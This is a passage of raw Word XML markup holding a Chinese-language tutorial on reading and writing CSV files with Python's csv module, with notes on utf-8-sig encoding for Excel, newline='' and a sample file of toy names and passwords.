        <w:t>CSV(Comma-Separated Values)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即逗号分隔值，一种以逗号分隔按行存储的文本文件，所有的值都表现为字符串类型（注意：数字为字符串类型）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413957A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE3964D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有中文，应以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码读写，如果要支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Excel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看，应是要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf-8 with bom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utf-8-sig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6909E781" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C033068" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reader=csv.reader(f, delimiter=',')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：用来读取数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为生成器，每次读取一行，每行数据为列表格式，可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数指定分隔符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164D8E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E0F412" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writer=csv.writer(f)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：用来写入数据，按行写入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writerow(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单行写入，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>writerows(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嵌套列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批量写入多行，无须手动保存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500498D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27129F89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data.csv:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F013F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name,password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F8362" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc,123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32403AF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,123#456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6522F304" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#abc123,123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1BFC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>666,123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B67779" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a b,123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001262C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C645604" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="_Toc159779994"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>
    </w:p>
    <w:p w14:paraId="1044BC9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38047607" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E30BDB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with open('data.csv', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEAE0C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    reader = csv.reader(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE478D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    header = next(reader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBBF78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D30DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for row in reader:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8790F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D90813" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B17694A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须在文件打开的上下文中使用，否则文件被关闭后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F120D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有的数字被作为字符串，如果要使用数字格式，应使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int()/float()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做相应转换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D45237" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1062EB7D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="562" w:name="_Toc159779995"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>写入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="562"/>
    </w:p>
    <w:p w14:paraId="3DF0D647" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5940A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A121EDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header = ['name', 'password', 'status']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436AFBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7100F359" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8489C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ['abc', '123456', 'PASS'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A584A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ['</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', '123#456', 'PASS'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF0F2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ['</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>张</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#abc123', '123456', 'PASS'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B560BA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ['666', '123456', 'PASS'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F094155" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ['a b', '123456', 'PASS']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511C40E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2D4D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55DBACF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">with open('result.csv', 'w', encoding='utf-8', </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>newline=''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67878BC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>writer = csv.writer(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609F110" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>writer.writerow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671CD40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    writer.writerows(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DBF34E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F11D61F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>注意，打开文件时应指定格式为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">w, </w:t>
      </w:r>
      <w:r>
        <w:t>文本写入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>wb,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>二进制写入</w:t>
      </w:r>
      <w:r>
        <w:t>，当然，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>a/w+/r+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A50347D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>打开文件时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指定不自动添加新行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>newline='',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>否则每写入一行就或多一个空行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA4EFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果想写入的文件</w:t>
      </w:r>
      <w:r>
        <w:t>Excel</w:t>
      </w:r>
      <w:r>
        <w:t>打开没有乱码，</w:t>
      </w:r>
      <w:r>
        <w:t>utf-8</w:t>
      </w:r>
      <w:r>
        <w:t>可以改为</w:t>
      </w:r>
      <w:r>
        <w:t>utf-8-sig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB526DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A0B5CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题：写入时字符串拆开不是一个各自</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6AE77D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:t>https://blog.csdn.net/doubi1/article/details/108326912</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F8FD5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为加载数据的时候不是列表类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7DCE1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74586853" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修正示例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA730C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0779F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o = [['333'],['4444'],['55555'],['666666']]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDF430" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39ED7CA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with open("licenses.csv", "w", encoding="utf-8", newline="") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2DFE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    csv_w = csv.writer(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3F888" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in o:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC256EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        csv_w.writerow(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D4339" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658B0FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138A6DC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
